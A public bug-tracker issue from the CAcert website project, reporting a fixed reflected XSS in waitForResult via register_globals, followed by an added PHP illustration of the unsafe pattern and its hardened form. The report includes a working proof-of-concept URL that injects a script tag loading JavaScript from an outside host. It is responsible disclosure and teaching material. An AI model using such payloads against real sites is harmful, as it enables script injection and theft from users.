View Issue Details
| ID | Project | Category | View Status | Date Submitted | Last Update |
|---|---|---|---|---|---|
| 0000599 | Main CAcert Website | source code | public | 2008-08-17 12:42 | 2013-01-15 02:52 |

| Field | Value |
|---|---|
| Reporter | kriss |
| Assigned To | Sourcerer |
| Priority | normal |
| Severity | major |
| Reproducibility | always |
| Status | closed |
| Resolution | fixed |
| Fixed in Version | 2008 |
| Summary | 0000599: XSS exploit in general.php/waitForResult |
| Description | waitForResult will echo a passed string verbatim (certid:$table:$certid) when it times out. One place that passes an unencoded var to that function is account.php, oldid == 4. Line 0000266:0000370: waitForResult("emailcerts", $emailid, 4); $emailid can be injected using register_globals as long as the keytype var isn't present in the request. The scope of this is a bit limited since there's about a minute worth of waiting before the page returns. Proof of concept: https://www.cacert.org/account.php?oldid=4&&emailid=%3Cscript%20type=text/javascript%20src=http://people.0x63.nu/~kriss/cacert.js%3E%3C/script%3E |
| Tags | No tags attached. |
| Reviewed by | |
| Test Instructions | |
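The report describes two defects that combine into the XSS: the timeout message reflects `$certid` into the page without encoding, and `$emailid` is populated from the request via register_globals rather than read and validated explicitly. The following PHP is an added illustration of that pattern and its hardened form; it is not CAcert's code, and the function names (`waitForResult_unsafe`, `waitForResult_safe`, `readCertId`) and the constructed request are assumptions, not the real general.php/account.php source.

```php
<?php
// Added illustration, not CAcert's code. A minimal stand-in for the
// waitForResult() timeout path described in the report, in its unsafe
// form and in a hardened form. Function names are assumptions.

// Unsafe pattern: the identifier is echoed verbatim into the HTML page
// when the wait times out, so any markup inside it becomes part of the
// response. With register_globals on, $certid could arrive straight from
// the query string.
function waitForResult_unsafe(string $table, $certid): string
{
    // ... polling loop omitted; on timeout:
    return "certid:$table:$certid";
}

// Hardened pattern, part 1: read the id from an explicit superglobal
// (never from a variable register_globals may have populated) and
// accept it only if it is a positive integer.
function readCertId(array $request, string $key = 'emailid'): ?int
{
    if (!isset($request[$key])) {
        return null;
    }
    $id = filter_var(
        $request[$key],
        FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1]]
    );
    return $id === false ? null : $id;
}

// Hardened pattern, part 2: whatever is echoed is HTML-escaped at the
// point of output, so even a non-numeric table name cannot inject markup.
function waitForResult_safe(string $table, int $certid): string
{
    // ... polling loop omitted; on timeout:
    return htmlspecialchars("certid:$table:$certid", ENT_QUOTES, 'UTF-8');
}

// Constructed request resembling the shape of the report's proof of
// concept: oldid selects the code path, emailid carries markup.
$request = [
    'oldid'   => '4',
    'emailid' => '<script src="http://example.invalid/x.js"></script>',
];

// Unsafe path: the markup is returned unchanged and would be rendered.
echo waitForResult_unsafe('emailcerts', $request['emailid']), "\n";

// Hardened path: the same input is rejected before it reaches the page.
$id = readCertId($request);
if ($id === null) {
    echo "rejected: emailid is not a positive integer\n";
} else {
    echo waitForResult_safe('emailcerts', $id), "\n";
}

// Hardened path with a well-formed id: the timeout message is emitted,
// escaped, and contains only the expected certid:table:id text.
$goodId = readCertId(['emailid' => '42']);
if ($goodId !== null) {
    echo waitForResult_safe('emailcerts', $goodId), "\n";
}
```

The integer check is what closes the hole in account.php's call site; the output escaping in the helper is what keeps a future caller from reopening it. Both belong in place even after register_globals itself is switched off, since that setting only removes one of the ways attacker-controlled text can reach `$certid`.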
| Date Modified | Username | Field | Change | 
|---|---|---|---|
| 2008-08-17 12:42 | kriss | New Issue | |
| 2008-08-17 13:25 | Sourcerer | Note Added: 0001144 | |
| 2008-08-17 13:25 | Sourcerer | Status | new => solved? | 
| 2008-08-17 13:25 | Sourcerer | Fixed in Version | => production | 
| 2008-08-17 13:25 | Sourcerer | Resolution | open => fixed | 
| 2008-08-17 13:25 | Sourcerer | Assigned To | => Sourcerer | 
| 2008-08-17 13:43 | kriss | Note Added: 0001145 | |
| 2008-08-17 13:43 | kriss | Status | solved? => closed | 
| 2010-07-27 15:38 | Sourcerer | View Status | private => public | 
| 2013-01-15 02:52 | Werner Dworak | Fixed in Version | => 2008 |